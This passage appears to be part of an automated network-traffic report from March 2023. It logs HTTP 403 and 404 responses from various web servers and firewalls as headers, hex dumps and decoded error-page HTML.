72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty/1.15.8.2</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 22 Mar 2023 04:45:35 GMTContent-Type: text/htmlContent-Length: 2843Connection: keep-aliveVary: Accept-EncodingLast-Modified: Thu, 26 Jul 2018 17:13:08 GMTETag: "b1b-571ea1be9f445"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 45 55 43 2d 4a 50 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 58 53 45 52 56 45 52 20 49 6e 63 2e 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 4e 44 45 58 2c 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2a 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 7d 0a 69 6d 67 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 7d 0a 75 6c 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 65 6d 3b 0a 7d 0a 68 74 6d 6c 20 7b 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 2d 79 3a 20 73 63 72 6f 6c 6c 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 33 62 37 39 62 37 3b 0a 7d 0a 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 a5 e1 a5 a4 a5 ea a5 aa 22 2c 20 4d 65 69 72 79 6f 2c 20 22 a3 cd a3 d3 20 a3 d0 a5 b4 a5 b7 a5 c3 a5 af 22 2c 20 22 4d 53 20 50 47 6f 74 68 69 63 22 2c 20 22 a5 d2 a5 e9 a5 ae a5 ce b3 d1 a5 b4 20 50 72 6f 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 37 35 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 68 32 20 7b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Wed, 22 Mar 2023 04:45:35 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 15015X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: BNP006Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 34 64 38 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 61 63 63 65 73 73 2d 64 65 6e 69 65 64 20 63 6c 65 61 72 66 69 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 20 63 65 6e 74 65 72 20 77 69 64 74 68 2d 6d 61 78 2d 39 34 30 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 62 72 61 6e 64 2d 6
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:35 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originPermissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Frame-Options: SAMEORIGINCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=N5zGp%2BoEjyJgTavyF1aeVyAGqyqqkt9oiW7Fo8Is5Ps0d%2FKDnfibv%2Bybz4gwA8CJJBZMrMzl%2FHVwDVhwmhvl5ouGNTzqRV5n5lT4BjqDavLKTEv%2BJX2F0zPMCy9npw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc93bbdf792b9-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 62 35 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 Data Ascii: 1b59<!DOCTYPE html><html lang="en-US"><head> <title>Just a moment...</title> <meta
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:36 GMTContent-Type: text/htmlContent-Length: 548X-Seen-By: GXNXSWFXisshliUcwO20NXdyD4zpCpFzpCPkLds0yMcVCNBFLDC86+VsazPJgXnP,qquldgcFrj2n046g4RNSVCA9lUGGSSQQI3tXitet/XU=X-Wix-Request-Id: 1679460336.03735447480101362X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Via: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:36 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=iFyNsUT6ZGOwgj8HEaJOkPvkfTcYAuTNX3xyJpYHhbUBUP%2BlrnI8Xx3L9lNuGb1OwelMDIJsbpk9Oxs3pLKJ6W26pUdpHzf%2Fz3NME33%2FvMzO12gM0amDJLPiPiksLTJE"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc93c9db09b1f-FRAData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:36 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rrESYRe5jRjzirlT4YCRE4Sby3FmzhEVozyd%2FO6h555Onatsa03mqiy%2FFiVs2ox8QPoCOvGqMmRNhw9iZOquE2A2qX9YXyl0ERQi3GHyBLtWCUGvYYGT7pZ8uC%2Fxd%2B3G"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc93ccde39b1f-FRAData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:36 GMTServer: ApacheContent-Length: 199Keep-Alive: timeout=5, max=300Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Wed, 22 Mar 2023 04:45:36 GMTserver: Apachecontent-length: 199content-type: text/html; charset=iso-8859-1x-server: coxkitch-svrData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 22 Mar 2023 04:45:36 GMTContent-Type: text/htmlContent-Length: 19268Connection: keep-aliveServer: ApacheLast-Modified: Fri, 13 May 2022 08:04:11 GMTAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 2
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:36 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveServer: nginxVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:36 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this 